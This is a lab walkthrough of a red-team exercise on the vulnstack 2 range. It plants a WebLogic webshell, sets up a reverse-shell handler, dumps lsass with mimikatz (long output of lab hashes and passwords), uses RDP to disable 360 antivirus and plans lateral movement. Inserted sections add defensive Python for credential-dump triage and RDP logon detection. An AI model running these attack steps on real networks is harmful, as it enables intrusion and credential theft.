Penetration Lab | Penetration Lab -- vulnstack Red Team Assessment Practice (2)

vulnstack Red Team Assessment Practice (2): environment setup

Attacker:
    kali     192.168.154.129
    windows  192.168.154.1
Targets:
    WEB (external edge server):  10.10.10.80 / 192.168.154.80
    PC  (domain member):         192.168.154.201 / 10.10.10.201
    DC  (domain controller):     10.10.10.10

1. External host reconnaissance
Scan the web server's ports with nmap

Ports 80 and 7001 are open.
Port 80 serves nothing; port 7001 is WebLogic, version 10.3.6.0.
Just use a tool to get code execution.

Upload the Behinder (冰蝎) JSP script

Write the shell into the console's images directory:
C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

Upload the webshell to that directory and browse to it.

Getting past 360 requires Godzilla's (哥斯拉) JMeterpreter or Behinder's reverse shell. Handler on the attacker side:
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lport 23334
set lhost ip
run

2. Bring the host online in CS (Cobalt Strike)
Once the beacon is up, run Taowu's (梼杌) SharpDump to produce the lsass dump file, download it and parse it offline to recover the credentials; running it directly from CS works as well.
  .#####.   mimikatz 2.2.0 (x64) #19041 Jul  5 2021 23:35:52
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 1377898 (00000000:0015066a)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:48:44
SID               : S-1-5-21-2756371121-2868759905-3853650604-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : Administrator
         * Domain     : de1ay.com
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 1254898 (00000000:001325f2)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:48:28
SID               : S-1-5-21-2756371121-2868759905-3853650604-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : Administrator
         * Domain     : de1ay.com
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 577210 (00000000:0008ceba)
Session           : Interactive from 1
User Name         : mssql
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:47:06
SID               : S-1-5-21-2756371121-2868759905-3853650604-2103
        msv :
         [00000003] Primary
         * Username   : mssql
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : mssql
         * Domain     : DE1AY.COM
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB$
Domain            : DE1AY
Logon Server      : (null)
Logon Time        : 2021/7/15 14:45:48
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username   : WEB$
         * Domain     : DE1AY
         * NTLM       : 365fd8c1b308ccb808beea336bc56d64
         * SHA1       : ac867401325d0a76ded9593c34166f7efcc79c5f
        tspkg :
        wdigest :
         * Username   : WEB$
         * Domain     : DE1AY
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        kerberos :
         * Username   : web$
         * Domain     : de1ay.com
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        ssp :
        credman :

Authentication Id : 0 ; 51042 (00000000:0000c762)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2021/7/15 14:45:47
SID               :
        msv :
         [00000003] Primary
         * Username   : WEB$
         * Domain     : DE1AY
         * NTLM       : 365fd8c1b308ccb808beea336bc56d64
         * SHA1       : ac867401325d0a76ded9593c34166f7efcc79c5f
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 1849027 (00000000:001c36c3)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2021/7/15 14:52:17
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username   : WEB$
         * Domain     : DE1AY
         * NTLM       : 365fd8c1b308ccb808beea336bc56d64
         * SHA1       : ac867401325d0a76ded9593c34166f7efcc79c5f
        tspkg :
         * Username   : WEB$
         * Domain     : DE1AY
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        wdigest :
         * Username   : WEB$
         * Domain     : DE1AY
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        kerberos :
         * Username   : WEB$
         * Domain     : de1ay.com
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        ssp :
        credman :

Authentication Id : 0 ; 1234405 (00000000:0012d5e5)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:48:13
SID               : S-1-5-21-2756371121-2868759905-3853650604-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : Administrator
         * Domain     : de1ay.com
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 884085 (00000000:000d7d75)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:47:31
SID               : S-1-5-21-2756371121-2868759905-3853650604-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : Administrator
         * Domain     : de1ay.com
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2021/7/15 14:46:08
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 173631 (00000000:0002a63f)
Session           : Service from 0
User Name         : mssql
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:46:07
SID               : S-1-5-21-2756371121-2868759905-3853650604-2103
        msv :
         [00000003] Primary
         * Username   : mssql
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : mssql
         * Domain     : DE1AY.COM
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 150181 (00000000:00024aa5)
Session           : Service from 0
User Name         : mssql
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2021/7/15 14:45:50
SID               : S-1-5-21-2756371121-2868759905-3853650604-2103
        msv :
         [00000003] Primary
         * Username   : mssql
         * Domain     : DE1AY
         * LM         : f67ce55ac831223dc187b8085fe1d9df
         * NTLM       : 161cff084477fe596a5db81874498a24
         * SHA1       : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        wdigest :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : mssql
         * Domain     : DE1AY.COM
         * Password   : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2021/7/15 14:45:48
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB$
Domain            : DE1AY
Logon Server      : (null)
Logon Time        : 2021/7/15 14:45:47
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : WEB$
         * Domain     : DE1AY
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        kerberos :
         * Username   : web$
         * Domain     : DE1AY.COM
         * Password   : d8 f1 4f 1a 85 72 e4 68 81 d6 02 a9 ed 66 65 f8 71 93 30 fb d7 4b a0 34 f5 c2 b2 2d a9 a4 c7 cf e6 38 27 78 0d 9a 43 d8 aa 71 65 75 a3 ef 6c e9 5d f1 fc 96 2d 47 67 ce fe ed 26 73 0c 4f 10 ce 4c 70 7c 8d 69 db da e9 92 ca f4 a2 b2 42 77 49 84 ac 66 1b 7d ac e9 f6 a1 11 3e 5b 5d 9e 47 db 44 97 a4 40 2e c7 13 80 71 33 be 7e b1 47 28 6a 89 bc fb ce c2 30 01 77 ba 50 39 cb 53 e6 bc 86 7c 73 86 01 83 3e f9 0f d4 d5 39 37 16 a2 b5 4f a3 73 7f 35 b0 fd 66 77 d2 ac 67 0e 96 2d 2d 40 6e 04 b9 9f 87 15 c6 c1 7d 77 1f 9e 31 52 45 b6 93 44 96 97 37 4f c1 f6 dd 1c 5d 8d e0 ab a0 12 00 0d fa 28 ab 65 91 29 cc 09 d2 fa 1e 71 02 b7 5e a3 65 1b d2 58 77 8e 26 e1 4f b1 21 7d 78 f5 3c 93 06 fd 25 7a 1c ce e7 36 59 46 9b fb 39 c3
        ssp :
        credman :

So the domain is de1ay.com and the domain controller is DC; the domain has mssql and Administrator accounts, both with password 1qaz@WSX.
3. Connect remotely and shut down 360
Listing domain computers with net commands turns out to be blocked by 360 as well, so dump the local user credentials and try a remote desktop connection to shut 360 down.
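Two things in the dump above are worth pulling out for a report, and they are easy to miss in a wall of text: the mssql service account and the domain Administrator share the same NTLM hash (the same password), and the wdigest/tspkg providers still hold cleartext passwords, which means credential caching has not been hardened on that host (the WDigest `UseLogonCredential` mitigation). The triage script below is an added example, not code from the original post or from any of the tools it uses; it parses the text layout that `sekurlsa::logonPasswords` prints and reports both findings. The sample dump embedded in it is constructed from the accounts and hashes shown on this page.

```python
"""Triage a mimikatz sekurlsa::logonPasswords dump for password reuse and
cleartext credential caching.

Added example, not from the original post or from mimikatz itself. Records
are keyed by (DOMAIN, username); the DNS suffix is stripped so that DE1AY and
de1ay.com count as the same domain.
"""
import re
from collections import defaultdict

# Constructed sample: an abbreviated dump using the accounts and hashes shown on this page.
SAMPLE_DUMP = """
Authentication Id : 0 ; 1377898 (00000000:0015066a)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : DE1AY
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : DE1AY
         * NTLM       : 161cff084477fe596a5db81874498a24
        wdigest :
         * Username   : Administrator
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
        kerberos :
         * Username   : Administrator
         * Domain     : de1ay.com
         * Password   : 1qaz@WSX
Authentication Id : 0 ; 577210 (00000000:0008ceba)
Session           : Interactive from 1
User Name         : mssql
Domain            : DE1AY
        msv :
         [00000003] Primary
         * Username   : mssql
         * Domain     : DE1AY
         * NTLM       : 161cff084477fe596a5db81874498a24
        wdigest :
         * Username   : mssql
         * Domain     : DE1AY
         * Password   : 1qaz@WSX
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEB$
Domain            : DE1AY
        msv :
         [00000003] Primary
         * Username   : WEB$
         * Domain     : DE1AY
         * NTLM       : 365fd8c1b308ccb808beea336bc56d64
        wdigest :
         * Username   : WEB$
         * Domain     : DE1AY
         * Password   : d8 f1 4f 1a 85 72 e4 68
"""

PROVIDER_RE = re.compile(r"^\s*(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:\s*$")
FIELD_RE = re.compile(r"^\s*\*\s*(Username|Domain|NTLM|Password)\s*:\s*(.*?)\s*$")
HEX_BLOB_RE = re.compile(r"^([0-9a-f]{2} )+[0-9a-f]{2}$")  # machine-account password bytes


def parse_logon_passwords(text):
    """Return {(DOMAIN, user): {"ntlm": set(), "cleartext": {provider: password}}}."""
    records = defaultdict(lambda: {"ntlm": set(), "cleartext": {}})
    provider, current = None, {}
    for line in text.splitlines():
        m = PROVIDER_RE.match(line)
        if m:                       # a new provider block resets the pending identity
            provider, current = m.group(1), {}
            continue
        m = FIELD_RE.match(line)
        if not m or provider is None:
            continue                # header lines (User Name, SID, ...) are not '*' fields
        field, value = m.group(1), m.group(2)
        if field in ("Username", "Domain"):
            current[field] = value
            continue
        if value in ("", "(null)") or "Username" not in current or "Domain" not in current:
            continue
        key = (current["Domain"].split(".")[0].upper(), current["Username"].lower())
        if field == "NTLM":
            records[key]["ntlm"].add(value.lower())
        else:
            records[key]["cleartext"][provider] = value
    return dict(records)


def find_hash_reuse(records):
    """Map every NTLM hash that backs more than one account to those accounts."""
    by_hash = defaultdict(set)
    for (domain, user), rec in records.items():
        for h in rec["ntlm"]:
            by_hash[h].add(f"{domain}\\{user}")
    return {h: sorted(a) for h, a in by_hash.items() if len(a) > 1}


def find_cleartext(records):
    """List (account, provider, kind) for every cleartext credential in the dump.
    Machine accounts ($) hold random 240-byte passwords and are labelled separately,
    since they are not user-chosen secrets even though they are still reusable."""
    findings = []
    for (domain, user), rec in sorted(records.items()):
        for provider, pw in sorted(rec["cleartext"].items()):
            kind = "machine-account blob" if user.endswith("$") or HEX_BLOB_RE.match(pw) else "user password"
            findings.append((f"{domain}\\{user}", provider, kind))
    return findings


if __name__ == "__main__":
    recs = parse_logon_passwords(SAMPLE_DUMP)
    for h, accounts in find_hash_reuse(recs).items():
        print(f"password reuse: NTLM {h} shared by {', '.join(accounts)}")
    for account, provider, kind in find_cleartext(recs):
        print(f"cleartext in {provider}: {account} ({kind})")
```

On the page's own dump this reports the shared hash behind DE1AY\administrator and DE1AY\mssql, and cleartext entries for both in wdigest and kerberos. The second finding is the one that turns into a configuration fix: with WDigest cleartext caching disabled, a future lsass dump would yield hashes only.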

The de1ay account's password is 1qaz@WSX; the others are blank?

After confirming the remote desktop service is running and checking its port, try to connect.
de1ay/administrator logs in successfully, and 360 can be shut down.
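From the defender's side, the step just described leaves a clear trace: a Windows Security event 4624 with LogonType 10 (RemoteInteractive) for the domain Administrator on the PC, sourced from the WEB server rather than from an admin workstation. The detection below is an added example, not part of the original post; it runs over 4624 records exported as one JSON object per line and flags RDP logons by watch-listed privileged accounts whose source address is outside a jump-host allowlist, enriching the hit with the name of the server the logon came from. The events, the watchlist, the allowlist and the host map are constructed for this lab's addressing.

```python
"""Flag RDP (LogonType 10) logons by privileged accounts from non-approved sources.

Added example, not from the original post. Input is Windows Security event 4624
records, one JSON object per line (the field names follow the event's XML data).
The watchlist, jump-host allowlist and host map are hypothetical values for this lab.
"""
import json
from ipaddress import ip_address, ip_network

PRIVILEGED_ACCOUNTS = {("DE1AY", "administrator")}             # (DOMAIN, user), lowercased user
JUMP_HOST_NETS = [ip_network("10.10.10.100/32")]                # hypothetical admin workstation
KNOWN_SERVERS = {"10.10.10.80": "WEB", "10.10.10.10": "DC"}     # lab servers from this page
REMOTE_INTERACTIVE = 10                                         # 4624 LogonType for RDP

# Constructed sample events: the lab's RDP logon from WEB to PC as Administrator,
# an approved admin logon, a service logon and a network logon by the WEB$ machine account.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 4624, "Computer": "PC.de1ay.com", "TargetUserName": "Administrator",
     "TargetDomainName": "DE1AY", "LogonType": 10, "IpAddress": "10.10.10.80",
     "TimeCreated": "2021-07-15T15:02:11"},
    {"EventID": 4624, "Computer": "PC.de1ay.com", "TargetUserName": "Administrator",
     "TargetDomainName": "DE1AY", "LogonType": 10, "IpAddress": "10.10.10.100",
     "TimeCreated": "2021-07-15T09:00:00"},
    {"EventID": 4624, "Computer": "WEB.de1ay.com", "TargetUserName": "mssql",
     "TargetDomainName": "DE1AY", "LogonType": 5, "IpAddress": "-",
     "TimeCreated": "2021-07-15T14:45:50"},
    {"EventID": 4624, "Computer": "PC.de1ay.com", "TargetUserName": "WEB$",
     "TargetDomainName": "DE1AY", "LogonType": 3, "IpAddress": "10.10.10.80",
     "TimeCreated": "2021-07-15T15:01:50"},
])


def is_allowed_source(ip_text):
    """True for local/console logons ("-", loopback) and for approved jump-host addresses."""
    try:
        ip = ip_address(ip_text)
    except ValueError:          # 4624 writes "-" when there is no network source
        return True
    if ip.is_loopback:
        return True
    return any(ip in net for net in JUMP_HOST_NETS)


def find_suspicious_rdp_logons(lines, privileged=PRIVILEGED_ACCOUNTS):
    """Return one finding per RDP logon by a privileged account from a non-approved source."""
    findings = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4624 or ev.get("LogonType") != REMOTE_INTERACTIVE:
            continue
        account = (ev["TargetDomainName"].upper(), ev["TargetUserName"].lower())
        if account not in privileged or is_allowed_source(ev["IpAddress"]):
            continue
        src = ev["IpAddress"]
        findings.append({
            "time": ev["TimeCreated"],
            "target": ev["Computer"],
            "account": f"{account[0]}\\{account[1]}",
            "source": src,
            # A privileged RDP session originating from a server is the lateral-movement signal.
            "source_host": KNOWN_SERVERS.get(src, "unknown"),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_rdp_logons(SAMPLE_EVENTS):
        print(f"{f['time']} {f['account']} RDP to {f['target']} from {f['source']} ({f['source_host']})")
```

The rule deliberately ignores the WEB$ network logon and the mssql service logon: they are normal domain traffic. What it isolates is the combination the walkthrough relies on, a tier-0 account opening an interactive session on a workstation from a web server, and the same 4624/LogonType 10 pattern is the right place to anchor an alert for the AV shutdown that follows.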

4. Internal network reconnaissance
Use the domain administrator account to gather domain information, then take the remaining hosts directly over SMB.
